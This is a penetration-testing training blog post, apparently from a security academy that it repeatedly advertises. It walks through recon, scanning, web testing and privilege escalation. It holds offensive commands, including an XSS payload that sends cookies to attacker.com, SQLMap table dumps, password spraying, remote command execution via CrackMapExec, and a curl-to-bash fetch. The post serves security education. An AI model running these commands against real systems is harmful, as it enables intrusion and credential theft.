Ethical hacking is not a hobby you pick up over a weekend. It is a discipline built on deep technical knowledge, methodical thinking, and a clear understanding of boundaries. Whether you are a developer curious about offensive security, a sysadmin who wants to understand what attackers actually do, or someone considering a career in penetration testing, this guide gives you a practical, no-nonsense roadmap.
The term "ethical hacking" gets thrown around loosely, but in professional practice it refers to authorized, structured attempts to compromise systems, applications, or networks in order to identify vulnerabilities before malicious actors do. The operative word is authorized. Without explicit written permission from the system owner, every technique described in this post is illegal.
Ethical hackers, also called penetration testers or red teamers, operate under a defined scope. That scope is agreed upon in a Rules of Engagement (RoE) document before a single packet is sent. Violating scope, even accidentally, can end careers and result in prosecution.
The three pillars of ethical hacking work are:
If you want to build a career in this field, understanding the legal and ethical framework is just as important as understanding TCP/IP.
You cannot exploit what you do not understand. A working knowledge of the OSI model, TCP/IP stack, DNS, ARP, HTTP/S, and common port behaviors is non-negotiable. You should be able to read a packet capture in Wireshark and understand what is happening at each layer.
Know these by heart:
Professional penetration testers live in the terminal. Kali Linux and Parrot OS are the standard distributions, but the tools matter less than the fluency. You should be comfortable navigating the filesystem, managing permissions, writing Bash one-liners, and automating repetitive recon tasks with Python.
Here is a simple Python script that performs a basic port scan using raw sockets, the kind of foundational exercise every learner should build before reaching for automated tools:
import socket
import sys
target = sys.argv[1]
ports = range(1, 1025)
print(f"Scanning {target}...")
for port in ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex((target, port))
if result == 0:
print(f"Port {port}: OPEN")
sock.close()
[cta]
Building tools from scratch teaches you what commercial scanners do under the hood. Once you understand it at the socket level, you will use Nmap with far more precision.
The majority of penetration testing engagements today involve web applications. You need a solid grasp of the OWASP Top 10, including SQL injection, broken authentication, IDOR, SSRF, and XSS. More importantly, you need to understand why these vulnerabilities exist at the code level, not just how to detect them with a scanner.
If you are serious about advancing your hands-on skills, the structured learning paths at Redfox Cybersecurity Academy cover web application testing from first principles through advanced exploitation techniques.
Understanding how Windows and Linux manage processes, memory, file permissions, and user privileges is critical for post-exploitation work. Privilege escalation, for example, almost always involves abusing a misconfiguration or unpatched vulnerability in the OS layer.
On Windows, you should understand:
On Linux, you should understand:
Professional penetration testers do not just fire up tools randomly. They follow a structured methodology. Most align with one of these frameworks: PTES (Penetration Testing Execution Standard), OWASP Testing Guide, or NIST SP 800-115.
The phases typically look like this:
1. Reconnaissance, 2. Scanning and Enumeration, 3. Exploitation, 4. Post-Exploitation, 5. Reporting
Each phase builds on the last. Sloppy recon leads to missed attack surface. Missed attack surface means incomplete findings. Incomplete findings mean the client's environment is not actually secure after your engagement.
Passive recon means gathering information without touching the target's infrastructure. This is where you learn the most without exposing yourself.
Key passive recon techniques and tools include:
WHOIS and DNS enumeration:
whois targetdomain.com
dig targetdomain.com any
dnsx -d targetdomain.com -a -aaaa -cname -mx -ns -txt -resp
[cta]
Subdomain discovery with Subfinder and Amass:
subfinder -d targetdomain.com -all -recursive -o subdomains.txt
amass enum -passive -d targetdomain.com -o amass_output.txt
[cta]
Certificate transparency log searching:
Certificate transparency logs are a goldmine for subdomain discovery. Tools like crt.sh and tlsx query these logs without generating any traffic toward the target.
curl -s "https://crt.sh/?q=%.targetdomain.com&output=json" | jq '.[].name_value' | sort -u
[cta]
Google dorks for exposed assets:
site:targetdomain.com filetype:env
site:targetdomain.com inurl:admin
site:targetdomain.com ext:sql OR ext:bak OR ext:log
[cta]
This kind of OSINT work often reveals staging environments, forgotten admin panels, and leaked configuration files before a single port scan is run.
Once you have passive intelligence and authorization to proceed, active recon begins. Nmap remains the industry standard for host discovery and service fingerprinting.
# Host discovery
nmap -sn 192.168.1.0/24
# Full TCP SYN scan with service/version detection and default scripts
nmap -sS -sV -sC -p- --min-rate 5000 -oA full_scan 192.168.1.100
# UDP scan for common services
nmap -sU -p 53,67,68,123,161,500 192.168.1.100
[cta]
For web applications, ffuf is the go-to tool for directory and parameter fuzzing:
# Directory brute-force
ffuf -u https://targetdomain.com/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200,301,302,403
# Virtual host discovery
ffuf -u https://targetdomain.com/ -H "Host: FUZZ.targetdomain.com" -w subdomains.txt -mc 200
[cta]
If you want to move from learner to practitioner on exactly these techniques, Redfox Cybersecurity Academy offers hands-on labs where you apply recon methodology against realistic target environments.
SQL Injection with SQLMap:
When you have confirmed a SQL injection point manually (always confirm manually first), SQLMap can automate extraction efficiently:
# Basic GET parameter injection test
sqlmap -u "https://target.com/page?id=1" --dbs --batch
# POST request injection with request file
sqlmap -r request.txt --level=5 --risk=3 --dbs --batch
# Extract specific table data
sqlmap -u "https://target.com/page?id=1" -D targetdb -T users --dump --batch
[cta]
Testing for SSRF:
Server-Side Request Forgery is consistently one of the most impactful vulnerabilities in modern cloud environments. A manual test using Burp Collaborator or interactsh:
# Start an interactsh listener
interactsh-client
# Inject the generated URL into a vulnerable parameter
curl -s "https://target.com/fetch?url=https://YOUR-INTERACTSH-ID.oast.fun"
[cta]
When the interactsh server receives a DNS or HTTP callback, SSRF is confirmed. From there, attackers can often pivot to internal services, cloud metadata endpoints (such as http://169.254.169.254/latest/meta-data/ in AWS), or internal APIs.
XSS with manual payload construction:
Automated scanners miss a huge proportion of XSS. Learning to construct and encode payloads manually is a core skill:
<!-- Basic reflected XSS test -->
<script>alert(document.domain)</script>
<!-- CSP bypass attempt using JSONP endpoint -->
<script src="https://accounts.google.com/o/oauth2/revoke?token=1"></script>
<!-- DOM XSS via innerHTML sink -->
<img src=x onerror=fetch(`https://attacker.com/?c=${document.cookie})>
[cta]
Responder for credential capture on internal networks:
On authorized internal network assessments, Responder poisons LLMNR, NBT-NS, and MDNS to capture NTLMv2 hashes:
sudo responder -I eth0 -dwv
[cta]
Captured hashes can then be cracked offline with Hashcat:
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt --force
[cta]
CrackMapExec for network lateral movement testing:
# Check SMB signing and authentication across a subnet
crackmapexec smb 192.168.1.0/24
# Password spray against a domain
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Execute a command on an authenticated target
crackmapexec smb 192.168.1.100 -u admin -p 'password' -x "whoami /all"
[cta]
This is exactly the kind of tooling covered in depth at Redfox Cybersecurity Academy, where labs simulate real enterprise Active Directory environments.
Post-exploitation is where engagements differentiate themselves. Finding a foothold is one thing. Demonstrating impact through privilege escalation and lateral movement is what makes a penetration test meaningful to a client.
LinPEAS is the standard automated enumeration script for Linux post-exploitation:
curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
[cta]
It checks for SUID binaries, writable cron jobs, kernel exploits, weak sudo rules, and dozens of other misconfigurations. But never rely on automation alone. Manual checks matter:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# List sudo rules for current user
sudo -l
# Check for writable cron jobs
ls -la /etc/cron* /var/spool/cron/
cat /etc/crontab
[cta]
WinPEAS performs the equivalent function on Windows targets:
.\winPEASx64.exe
[cta]
For token impersonation and privilege abuse, PrintSpoofer and GodPotato are modern alternatives to the older potato family of exploits:
.\PrintSpoofer64.exe -i -c cmd
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
[cta]
Understanding why these tools work, specifically how Windows handles token impersonation and SeImpersonatePrivilege, is what separates a practitioner from someone who just runs scripts.
Technical skills are learnable. Mindset is harder to teach.
The best ethical hackers share a few consistent traits:
You do not need expensive hardware to start practicing. A basic home lab for ethical hacking can run on a single machine with 16GB of RAM using virtualization:
# Clone and set up Game of Active Directory
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD
pip3 install -r requirements.txt --break-system-packages
[cta]
Practicing in controlled lab environments is the fastest path to building real competency before you ever run a commercial engagement.
Ethical hacking is a career path built on technical depth, professional discipline, and continuous growth. The skills that matter most are not which tools you know how to launch. They are whether you understand what those tools are doing, whether you can work within defined boundaries, and whether you can communicate your findings clearly to people who may not be technical.
Redfox Cybersecurity Academy exists to bridge the gap between theoretical knowledge and hands-on professional skill. If you are ready to move from reading about these techniques to actually practicing them in structured, realistic lab environments, start here and build the skills that the security industry actually needs.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
